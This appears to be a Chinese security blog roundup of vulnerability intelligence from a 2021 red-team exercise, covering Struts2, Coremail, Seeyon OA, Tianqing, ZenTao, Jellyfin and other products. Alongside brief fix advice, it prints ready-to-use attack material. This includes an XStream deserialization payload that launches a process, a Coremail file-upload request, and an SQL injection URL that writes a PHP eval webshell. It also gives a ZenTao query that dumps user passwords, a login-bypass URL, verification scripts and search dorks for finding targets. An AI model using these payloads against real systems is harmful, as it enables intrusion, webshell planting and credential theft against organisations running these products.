2021攻防演练行动漏洞情报(Day1-3)
2021-04-11 15:45:43 Author: www.freebuf.com(查看原文) 阅读量:605 收藏

Day4.10

Apache Struts 2.x REST远程代码执行【历史漏洞】

漏洞信息

近期,HW期间泄露情报,Apache Struts2 最新版存在0day漏洞,经验证该漏洞为历史漏洞。

情报来源

image.png

漏洞验证

使用上图中的poc进行验证,无法绕过黑名单。

image.png

历史POC

<map>
  <entry>
    <jdk.nashorn.internal.objects.NativeString>
      <flags>0</flags>
      <value class="com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data">
        <dataHandler>
          <dataSource class="com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource">
            <is class="javax.crypto.CipherInputStream">
              <cipher class="javax.crypto.NullCipher">
                <initialized>false</initialized>
                <opmode>0</opmode>
                <serviceIterator class="javax.imageio.spi.FilterIterator">
                  <iter class="javax.imageio.spi.FilterIterator">
                    <iter class="java.util.Collections$EmptyIterator"/>
                    <next class="java.lang.ProcessBuilder">
                      <command>
                        <string>calc.exe</string>
                      </command>
                      <redirectErrorStream>false</redirectErrorStream>
                    </next>
                  </iter>
                  <filter class="javax.imageio.ImageIO$ContainsFilter">
                    <method>
                      <class>java.lang.ProcessBuilder</class>
                      <name>start</name>
                      <parameter-types/>
                    </method>
                    <name>foo</name>
                  </filter>
                  <next class="string">foo</next>
                </serviceIterator>
                <lock/>
              </cipher>
              <input class="java.lang.ProcessBuilder$NullInputStream"/>
              <ibuffer></ibuffer>
              <done>false</done>
              <ostart>0</ostart>
              <ofinish>0</ofinish>
              <closed>false</closed>
            </is>
            <consumed>false</consumed>
          </dataSource>
          <transferFlavors/>
        </dataHandler>
        <dataLen>0</dataLen>
      </value>
    </jdk.nashorn.internal.objects.NativeString>
    <jdk.nashorn.internal.objects.NativeString reference="../jdk.nashorn.internal.objects.NativeString"/>
  </entry>
  <entry>
    <jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/>
    <jdk.nashorn.internal.objects.NativeString reference="../../entry/jdk.nashorn.internal.objects.NativeString"/>
  </entry>
</map>

参考链接

  1. https://www.cnblogs.com/zhaijiahui/p/7495199.html

浪潮 ClusterEngineV4.0 任意命令执行【POC】

漏洞信息

浪潮ClusterEngine集群管理平台是专为浪潮天梭系列HPC产品定制的一款作业管理软件,该软件采用B/S架构,通过浏览器(IE,firefox等)进行操作,可以管理集群系统中的软硬件资源和用户提交的作业,根据集群中的资源使用情况来合理的调度用户提交的作业,从而达到提高资源的利用率和作业的执行效率的作用。其4.0版本存在任意命令执行漏洞。

漏洞危害

攻击者通过发送精心构造的请求包到目标应用程序,将会造成远程命令执行漏洞。甚至获得目标站点的服务器权限。

fofa_dork

title="TSCEV4.0"

漏洞验证

image.png

验证POC

POC: https://github.com/xiaoshu-bit/ClusterEngineRce

pip3 install -r requirements.txt
python3 clusterengine_poc.py -u http://127.0.0.1:1111
def verify(self, first=False):
        target = self.scan_info['Target']
        verbose = self.scan_info['Verbose']
        headers = {
            "Content-Type": "application/x-www-form-urlencoded"
        }
        payload = "op=login&username=asd&password=asd'"
        try:
            url = urljoin(target, '/login')
            resp = req(url, 'post', data=payload,headers=headers,verify=False)
            if ('{"err"' in resp.text) and (" syntax error: unexpected end of file" in resp.text):
                log.highlight("found Inspur ClusterEngine v4.0 Remote Code Execution")
                self.scan_info['Success'] = True
                self.scan_info['Ret']['VerifyInfo']['URL'] = url
                self.scan_info['Ret']['VerifyInfo']['Payload'] = payload
                self.scan_info['Ret']['VerifyInfo']['method'] = "POST"
                return
        except Exception as e:
            log.info("[*]Request to target URL fail! {}".format(e))

参考链接

  1. https://github.com/xiaoshu-bit/ClusterEngineRce

修复方案

升级到修复版本

Coremail 邮件系统任意文件上传漏洞【POC】

漏洞信息

coremail产品诞生于1999年,经过二十多年发展,如今从亿万级别的运营系统,到几万人的大型企业,都有了Coremail的客户。截止2020年,Coremail邮件系统产品在国内已拥有10亿终端用户,是目前国内拥有邮箱使用用户最多的邮件系统。其特定版本范围内存在任意文件上传漏洞,攻击者可以上传webshell,从而造成远程代码执行。该漏洞为Nday,非hw期间漏洞。

漏洞危害:

其特定版本范围内存在任意文件上传漏洞,攻击者可以上传webshell,从而造成远程代码执行。

影响范围:

Coremail <= XT5.x

漏洞复现:

使用网上流传POC 进行验证 https://github.com/xiaoshu-bit/CoreMailUploadRce

pip3 install -r requirements.txt
python3 coremail_upload.py -u http://127.0.0.1:1111

文件上传poc:

POST /webinst/action.jsp HTTP/1.1
Host: 120.136.129.10
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.76 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Content-Length: 99
Connection: close

func=checkserver&webServerName=127.0.0.1:6132/%0d@/home/coremail/web/webapp/justtest.jsp%20JUSTTEST

文件内容上传,将会在/home/coremail/web/webapp/目录下上传一个justtest.jsp的文件

image.png

成功上传。也可用于上传webshell文件。从而造成远程代码执行。

image.png

修复方案:

目前coremail官方已经发布了解决此漏洞的软件更新,建议受影响用户尽快升级到安全版本,

参考链接

https://github.com/xiaoshu-bit/CoreMailUploadRce

Solr 任意文件读取漏洞【历史漏洞】

漏洞信息

Apache Solr是美国阿帕奇(Apache)软件基金会的一款基于Lucene(全文搜索引擎)的搜索服务器。该产品支持层面搜索、垂直搜索、高亮显示搜索结果等。

该漏洞是由于Apache Solr在默认安装时不会开启身份验证,攻击者在未授权情况下访问Config API打开requestDispatcher.requestParsers.enableRemoteStreaming开关,进而通过构造恶意请求,执行SSRF攻击,读取目标服务器的任意文件。该漏洞为Nday,非hw期间漏洞。

影响范围

Apache Solr <= 8.8.1

漏洞验证

经验证,该漏洞为历史漏洞,POC已流出, https://github.com/keven1z/SolrfilereadPOC

image.png

参考链接

  1. https://github.com/keven1z/SolrfilereadPOC

齐治堡垒机任意用户登录漏洞【未验证】

漏洞信息

浙江齐治科技股份有限公司是一家主要经营计算机软硬件、网络产品的技术开发等项目的公司,近日,HW期间情报齐治运维堡垒机服务端存在任意用户登录系统漏洞,漏洞情报泄露时间:2021-04-10 23:03:05

漏洞验证

http://xxx.xxx.xxx.xxx/audit/gui_detail_view.php?token=1&id=%5C&uid=%2Cchr(97))%20or%201:%20print%20

情报来源

漏洞真实性待验证,情报来源微步匿名用户

image.png

参考链接

https://x.threatbook.cn/v5/article?threatInfoID=3824

Day 4.8-Day4.9

JellyFin任意文件读取漏洞【POC】

漏洞信息

Jellyfin是一套多媒体应用程序软件套装,旨在组织、管理和共享数字媒体文件,是Emby的一个免费开源分叉,JellyFin的Windows端服务器不会对特定路径进行鉴权,可以导致攻击者利用Windows上的路径穿越来读取Windows服务器上的任意文件。本漏洞于2021年3月28日在最近版本的10.7.1中被修复。

漏洞危害

JellyFin的Windows端服务器不会对特定路径进行鉴权,可以导致攻击者利用Windows上的路径穿越来读取Windows服务器上的任意文件。

影响范围

Jellyfin<10.7.1

漏洞验证

目前POC已流出,ref: https://github.com/xiaoshu-bit/CVE-2021-21402

image.png

提供的验证脚本进行验证 https://github.com/xiaoshu-bit/CVE-2021-21402

pip3 install -r requirements.txt
python3 CVE-2021-21402.py -u http://127.0.0.1:1111 

修复方案

目前厂商已经发布修复相关问题,请受影响用户尽快升级到安全版本

参考链接

https://github.com/xiaoshu-bit/CVE-2021-21402

默安蜜罐管理平台未授权访问【官方辟谣】

漏洞信息

幻阵是默安科技首创的一款基于攻击混淆与欺骗防御技术的威胁检测防御系统,由于蜜罐管理平台鉴权不完善,可导致攻击者在未授权的情况下访问管理页面。默安官方发表通告并表示幻阵管理平台存在于内网网址,攻击者难以进行访问,且尽管可以访问也只能让幻阵执行ping指令,不会造成任何安全隐患。

漏洞危害

由于蜜罐管理平台鉴权不完善,可导致攻击者在未授权的情况下访问管理页面。

官方辟谣

默安科技关注到业内有人散布“默安科技幻阵管理后台存在认证绕过漏洞”的不实消息,特此作出如下说明。

image.png

参考链接

  1. https://mp.weixin.qq.com/s/LV460_N1-EsQUM8YhM5nuw

和信创天云桌面命令执行

漏洞信息

和信创天是虚拟化云计算领域,为集VOI/VDI/IDV于一体的云桌面,近期,HW期间泄露情报,和信创天云桌面存在远程代码执行漏洞,攻击者通过精心构造的请求数据发送个目标,将导致文件远程命令执行漏洞

漏洞危害

攻击者通过精心构造的请求数据发送个目标,将导致文件远程命令执行漏洞

漏洞验证

image.png

奇安信天擎越权访问【官方辟谣】

漏洞信息

奇安信终端安全管理系统是面向政企单位推出的一体化终端安全产品。集防病毒、终端安全管控、终端准入、终端审计、外设管控、EDR等功能于一体,兼容不同操作系统和计算平台,实现平台一体化、功能一体化、数据一体化的终端安全立体防护。近期,HW期间泄露情报,在Web登录界面且未登录的情况下会显示提示信息,并且会涉及用户组织,功能模块授权过期时间等。天擎官方发表声明并表示Web接口为正常接口,不存在漏洞。

漏洞危害

攻击者通过请求:GET /api/dbstat/gettablessize 可以,越权获取

官方辟谣

参考链接: https://forum.butian.net/share/58

天擎前台SQL注入漏洞【历史漏洞】

漏洞信息

奇安信终端安全管理系统是面向政企单位推出的一体化终端安全产品。近期,HW期间泄露情报,天擎存在前台SQL注入漏洞,攻击者通过精心构造的请求,将导致SQL注入漏洞,同时由于安装服务的用户极有可能拥有root权限,所以也可以进行webshell写入并达成命令执行。

漏洞利用

本段PoC将首先创建新的数据库表,后将数据库内容更名为webshell的目标名,最后删除表清理痕迹。

https://<IP>/api/dp/rptsvcsyncpoint?ccid=1';create table O(T TEXT);insert into O(T) values('<?php @eval($_POST[1]);?>');copy O(T) to '<目标文件写入路径>';drop table O;--

官方辟谣

该漏洞为内部已知问题,并且在2020年护网前的版本已经修复。

致远OA ajax.do 文件上传漏洞【历史漏洞】

漏洞信息

致远OA办公自动化软件, 用于OA办公自动化软件,近期,HW期间泄露情报,致远OA存在文件上传漏洞,多个致远OA文件上传与权限绕过漏洞利用的修复补丁。由于致远OA旧版本某些接口存在权限绕过漏洞,攻击者通过特制的HTTP请求将导致接口的权限机制被绕过,并结合某些接口功能实现在未授权情况下上传恶意文件,从而控制目标主机,经验证,该漏洞为2020年12月29日,致远官网发布的2020年10-12月安全通告中历史漏洞

漏洞危害

由于致远OA旧版本某些接口存在权限绕过漏洞,攻击者通过特制的HTTP请求将导致接口的权限机制被绕过,并结合某些接口功能实现在未授权情况下上传恶意文件,从而控制目标主机。

影响范围

致远OA V8.0

致远OA V7.1、V7.1SP1

致远OA V7.0、V7.0SP1、V7.0SP2、V7.0SP3

致远OA V6.0、V6.1SP1、V6.1SP2

致远OA V5.x

漏洞验证

通过对目标路径发送POST请求和制作好的压缩文件即可达成文件上传

image.png

检测方式可以通过managerMethod=toString的方式打印类名进行判断。

def verify(self, first=False):
        target = self.scan_info['Target']
        try:
            headers = {
                "Content-Type": "application/x-www-form-urlencoded"
            }
            url = urljoin(target, '/seeyon/autoinstall.do.css/..;/ajax.do?method=ajaxAction&managerName=formulaManager&requestCompress=gzip')
            data = "managerMethod=toString"
            r1 = req(url, 'post',data=data,headers=headers,verify=False)
            if 'com.seeyon.ctp.common.formula.manager.FormulaManagerImpl' in r1.text:
                log.highlight("found Seeyon AjaxAction File Upload")
                self.scan_info['Success'] = True
                self.scan_info['Ret']['VerifyInfo']['URL'] = url
                return
        except Exception as e:
            log.info("[*]Request to target URL fail! {}".format(e))

修复方案

致远官方已经发布了解决上述漏洞的安全更新,建议受影响用户尽快升级到安全版本:

安全版本:致远OA 各系列最新版本

官方安全补丁下载可以参考以下链接:

http://service.seeyon.com/patchtools/tp.html?#/patchList?type=安全补丁&id=1

参考链接

http://service.seeyon.com/patchtools/tp.html?#/patchList?type=安全补丁&id=1

https://vas.riskivy.com/vuln-detail?id=72

WPS 0 Day RCE

漏洞信息

近日,攻防演练行动中泄露情报,攻击者在通过恶意链接可以让WPS的内置浏览器进行沙箱逃逸和并令执行。请勿下载打开来路不明的WPS文件。情报来源于漏洞盒子情报星球

参考链接

https://planet.vulbox.com/detail/421

天融信数据防泄漏系统越权修改管理员密码【历史漏洞】

漏洞信息:

天融信数据防泄漏系统越权修改管理员密码,该漏洞为2020年8月17号收到历史情报,非近期HW期间漏洞,

影响范围:

攻击者可以越权修改管理员的密码。

情报来源:

情报来源日期:2020年8月17号

image.png

禅道11.6 SQL注入【历史漏洞】

漏洞信息

禅道 项目管理软件 是国产的开源项目管理软件,专注研发项目管理,内置需求管理、任务管理、bug管理、缺陷管理、用例管理、计划发布等功能,实现了软件的完整生命周期管理,其11.6版本存在SQL注入漏洞,该漏洞为Nday ,非HW期间0DAY

漏洞验证

注入来源于禅道采用的pathinfo,在以下URL中

http://xxx.xxx/zentaopms_11.6/www/api-getModel-api-sql-sql=select+account,password+from+zt_user

对路径的解析为getModel-<Model名字>-<Method名字>-<参数名字>=<参数的值>。所以在以上提供的URL中,请求是访问了API端的API model,调用了sql的method, 并且提供了相应的sql语句作为参数,而禅道在解析路径后会调用相关函数,执行sql语句,达成sql注入。

参考链接

  1. https://my.oschina.net/u/4587690/blog/4423181


文章来源: https://www.freebuf.com/articles/269155.html
如有侵权请联系:admin#unsafe.sh